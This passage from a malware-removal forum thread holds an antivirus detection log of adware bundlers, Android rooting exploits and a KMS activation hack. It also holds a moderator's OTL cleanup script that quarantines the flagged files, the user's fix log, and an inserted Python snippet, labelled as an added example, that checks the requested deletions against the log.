sh=294742C59CFB3FAAE38D3CE6B9C75BE062AFAA66 ft=1 fh=9215b8a5782cc616 vn="a variant of Win32/InstallBrain.AW potentially unwanted application" ac=I fn="C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe"
sh=505071B8AC2036536C8A52D5AE43FC6EB2915CAA ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AN trojan" ac=I fn="C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip"
sh=13DDFA1862B74BDBBC06FC8766B36B9B73B25760 ft=1 fh=891ef6f01345cc13 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe"
sh=2483ED987A0C85B80495BB0082BC33B03F76D64F ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AN trojan" ac=I fn="C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush"
sh=DFA332BA2B8A9CFD5488D752EF730E411C2861F2 ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AH trojan" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz"
sh=5A3E7AD20CC93238EA0E5EFF8889F31618704BB2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz"
sh=FC757C651470BF5F4D333C0C36008080F8A00B10 ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz"
sh=03EA704933408DBCEF43FFB1756D4016EAB352FC ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz"
sh=13EE8C9FCE6F74512DCD188CCA0655C5EDE37612 ft=1 fh=756c61b76c471ca8 vn="MSIL/HackKMS.A potentially unsafe application" ac=I fn="C:\Windows\AutoKMS\AutoKMS.exe"
sh=4A1A1AB54A25B55C5ABDF3F3F89C31475BE30D98 ft=1 fh=5616fe98454d279a vn="Win32/OpenCandy potentially unsafe application" ac=I fn="D:\My Documents\Downloads\avc-free.exe"
sh=6EB1CB1D94A00DAF1FB91218B050FDCBA8436C03 ft=1 fh=4ee2e677a5bceddb vn="Win32/Joke.ScreenMate potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\FELIX.EXE"
sh=FFB70E6A14EF730C3DD80BAABAA14B1B453DD2A0 ft=1 fh=66719f253af405bf vn="Win32/Joke.ScreenMate.AA potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\hotstuff.exe"
sh=68D0D2B3521A6F7DCFCF09811723F1E23F29554E ft=1 fh=ccae1559ce4c6262 vn="a variant of Win32/Joke.ScreenMate.AA potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\trickor.exe"
sh=DFA332BA2B8A9CFD5488D752EF730E411C2861F2 ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AH trojan" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz"
sh=5A3E7AD20CC93238EA0E5EFF8889F31618704BB2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz"
sh=FC757C651470BF5F4D333C0C36008080F8A00B10 ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz"
sh=03EA704933408DBCEF43FFB1756D4016EAB352FC ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz"
sh=93C1870062696A598F683D35947A900693686042 ft=1 fh=14e5eb4356bf1e0f vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="D:\My Documents\Programs\frostwire-5.2.3.windows.exe"
sh=6F060E73AC758019A64CFA9A9D6823A339F74E61 ft=1 fh=432e79709b596bc0 vn="a variant of Win32/Toolbar.Babylon.C potentially unwanted application" ac=I fn="D:\My Documents\Programs\PuranDefragFreeSetup.exe"
sh=3A89DAEE2C931D0AAA7B102D3DA9D2174DC5875E ft=1 fh=d16f3ccb0b0b7a97 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe"
sh=A8A37E54DB53B64808D4DE3DDBB505859E9F4269 ft=1 fh=b799c6fdeb2be9bc vn="Win32/Bundled.Toolbar.Google.E potentially unsafe application" ac=I fn="D:\My Documents\Programs\Computer Tools\ccsetup311.exe"
sh=FC4EB4C4C435E5994B76666E68C928F5E54CE727 ft=1 fh=0cbb88057912f97d vn="Win32/OpenCandy potentially unsafe application" ac=I fn="D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe"
sh=2D3AFEAA5C748F4F51BD6DE9F1E2A251381986A0 ft=1 fh=f659b58f9529ba18 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Documents and Settings\Ken\.frostwire5\updates\frostwire-5.5.5.windows.exe"
sh=49ACAFACAAC62A745E69D71A58CC9453C41B15D0 ft=1 fh=b98f31ba52914450 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe"
sh=2D3AFEAA5C748F4F51BD6DE9F1E2A251381986A0 ft=1 fh=f659b58f9529ba18 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Program Files\FrostWire 5\frostwire-installer.exe"
sh=533EBEE5E8DB5053E1F062B23F74DC1C72B153CE ft=1 fh=4a9334026ea419e3 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Program Files\FrostWire 5\OCSetupHlp.dll"
sh=FE0F99F8076E78035273E1DEA5C3B8A8763ED908 ft=0 fh=0000000000000000 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\UBCD4WinBuilder.iso"
sh=4B9B1607C28352F8FDE107E2E08AF260F0237A96 ft=1 fh=f338f095141cac61 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe"
sh=6661EDA8383915E3713D78F0189D1A15EB5D80C7 ft=1 fh=cd240aea2e807323 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe"
sh=EC70E13DB30A165A8CC77485C719BA0CD4A43CC3 ft=0 fh=0000000000000000 vn="a variant of Win32/RemoteAdmin.RemoteExec.AA potentially unsafe application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z"
sh=4B9B1607C28352F8FDE107E2E08AF260F0237A96 ft=1 fh=f338f095141cac61 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe"
sh=6661EDA8383915E3713D78F0189D1A15EB5D80C7 ft=1 fh=cd240aea2e807323 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe"
sh=EC70E13DB30A165A8CC77485C719BA0CD4A43CC3 ft=0 fh=0000000000000000 vn="a variant of Win32/RemoteAdmin.RemoteExec.AA potentially unsafe application" ac=I fn="F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z"
sh=890368473ECBC404DCD42FF0C6C38397102F59C0 ft=1 fh=4c7db45bf4256cb3 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\WINDOWS\system32\Process.exe"
 


  • 0

#12
Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

Let's remove the remnants. What issues are you facing currently?
  • Step #7 Fix with OTL
    • Re-run OTL by right clicking and choosing Run as administrator;
    • Under the Custom Scans/Fixes Box copy and paste the following contents inside the quote box. (Do not include the word 'quote').

      :Commands
      [createrestorepoint]

      :Files
      C:\Program Files\Mozilla Firefox\components\sprotector.js
      C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe
      C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip
      C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe
      C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz
      C:\Windows\AutoKMS\AutoKMS.exe
      D:\My Documents\Downloads\avc-free.exe
      D:\My Documents\Downloads\funstuff\FELIX.EXE
      D:\My Documents\Downloads\funstuff\hotstuff.exe
      D:\My Documents\Downloads\funstuff\trickor.exe
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz
      D:\My Documents\Programs\frostwire-5.2.3.windows.exe
      D:\My Documents\Programs\PuranDefragFreeSetup.exe
      D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe
      D:\My Documents\Programs\Computer Tools\ccsetup311.exe
      D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe
      F:\Documents and Settings\Ken\.frostwire5
      F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe
      F:\Program Files\FrostWire 5
      F:\UBCD4Win\UBCD4WinBuilder.iso
      F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe
      F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe
      F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z
      F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe
      F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe
      F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z
      F:\WINDOWS\system32\Process.exe

      :Commands
      [emptytemp]

    • Click on "Run Fix" and let the program run unhindered;
    • Your PC will reboot automatically and a log will be opened;
    • Please post it in your next reply.
 
  • Required Log(s):
    • OTL Fix Log
Regards,
Valinorum
  • 0

#13
Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Still getting the Windows cannot open file errors mentioned in post 9, otherwise all seems well.  Latest log:

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== FILES ==========
C:\Program Files\Mozilla Firefox\components\sprotector.js moved successfully.
C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe moved successfully.
C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip moved successfully.
C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe moved successfully.
C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush moved successfully.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz not found.
C:\Windows\AutoKMS\AutoKMS.exe moved successfully.
D:\My Documents\Downloads\avc-free.exe moved successfully.
D:\My Documents\Downloads\funstuff\FELIX.EXE moved successfully.
D:\My Documents\Downloads\funstuff\hotstuff.exe moved successfully.
D:\My Documents\Downloads\funstuff\trickor.exe moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz moved successfully.
D:\My Documents\Programs\frostwire-5.2.3.windows.exe moved successfully.
D:\My Documents\Programs\PuranDefragFreeSetup.exe moved successfully.
D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe moved successfully.
D:\My Documents\Programs\Computer Tools\ccsetup311.exe moved successfully.
D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe moved successfully.
F:\Documents and Settings\Ken\.frostwire5\updates folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\themes folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\search_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\library_db\library_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\library_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\jd_home folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images\overlays\shop folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images\overlays folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com\5128 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com\5047 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4147 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4089 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4084 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4055 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4047 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4028 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com\1218 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com\1207 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\dbs\sharefiles.1 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\dbs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\tmp folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\plugins folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\net folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\logs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\dht folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\active\A76F4A518FB878E238525BEC8F3A94DB05B61694 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\active\3605F4A1EADE6F2A02500AE63ECBD87C645B1241 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\active folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\tmp folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\logs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\cfg folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5 folder moved successfully.
F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\SystemV folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Pacific folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Indian folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Europe folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Etc folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Australia folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Atlantic folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Asia folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Antarctica folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\North_Dakota folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Kentucky folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Indiana folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Argentina folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Africa folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\servicetag folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\security folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\management folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\images\cursors folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\images folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\i386 folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\ext folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\cmm folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib folder moved successfully.
F:\Program Files\FrostWire 5\jre\bin\server folder moved successfully.
F:\Program Files\FrostWire 5\jre\bin folder moved successfully.
F:\Program Files\FrostWire 5\jre folder moved successfully.
F:\Program Files\FrostWire 5 folder moved successfully.
F:\UBCD4Win\UBCD4WinBuilder.iso moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z moved successfully.
F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe moved successfully.
F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe moved successfully.
F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z moved successfully.
F:\WINDOWS\system32\Process.exe moved successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Ken
->Temp folder emptied: 73816 bytes
->Temporary Internet Files folder emptied: 19525166 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 27680275 bytes
->Google Chrome cache emptied: 10508514 bytes
->Flash cache emptied: 506 bytes
 
User: Public
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 88469126 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 257536 bytes
 
Total Files Cleaned = 140.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 05222014_041016

Files\Folders moved on Reboot...
C:\Windows\temp\MpCmdRun.log moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 


  • 0
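A fix log this long is easy to misread, so the requested `:Files` entries can be reconciled against the logged outcomes mechanically. The sketch below is an added example, not part of the original posts and not an OTL feature; it uses short excerpts of the script and log above, and the function names `parse_fix_log` and `reconcile` are made up for illustration.

```python
import re

# Excerpt of the :Files list from the fix script in post #12.
REQUESTED = r"""
C:\Program Files\Mozilla Firefox\components\sprotector.js
C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz
C:\Windows\AutoKMS\AutoKMS.exe
F:\Program Files\FrostWire 5
F:\WINDOWS\system32\Process.exe
""".strip().splitlines()

# Excerpt of the FILES section of the fix log in post #13. The Process.exe
# line is left out of this excerpt on purpose to exercise the "no entry"
# branch; the full log above does contain it.
FIX_LOG = r"""
========== FILES ==========
C:\Program Files\Mozilla Firefox\components\sprotector.js moved successfully.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz not found.
C:\Windows\AutoKMS\AutoKMS.exe moved successfully.
F:\Program Files\FrostWire 5\jre\bin folder moved successfully.
F:\Program Files\FrostWire 5\jre folder moved successfully.
F:\Program Files\FrostWire 5 folder moved successfully.
========== COMMANDS ==========
"""

MOVED = re.compile(r"^(?P<path>.+?)(?: folder)? moved successfully\.$")
MISSING = re.compile(r"^File\\Folder (?P<path>.+) not found\.$")

def parse_fix_log(text):
    """Return {lowercased path: 'moved' | 'not found'} for the FILES section."""
    results, in_files = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("=========="):
            in_files = "FILES" in line  # only the FILES section is parsed
            continue
        if not in_files or not line:
            continue
        m = MISSING.match(line)
        if m:
            results[m["path"].lower()] = "not found"
            continue
        m = MOVED.match(line)
        if m:
            results[m["path"].lower()] = "moved"
    return results

def reconcile(requested, log_text):
    """Map each requested path to its logged outcome, or 'no entry'."""
    results = parse_fix_log(log_text)  # Windows paths compare case-insensitively
    return {p: results.get(p.lower(), "no entry") for p in requested}

if __name__ == "__main__":
    for path, status in reconcile(REQUESTED, FIX_LOG).items():
        print(f"{status:10} {path}")
```

Entries reported as "not found" or "no entry" are the ones worth checking by hand before treating the cleanup as complete.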

#14
Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
This is good news. Can you take a screenshot of the error and attach the picture here?
  • 0

#15
Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Screen capture is attached.

 

Capture.JPG


  • 0





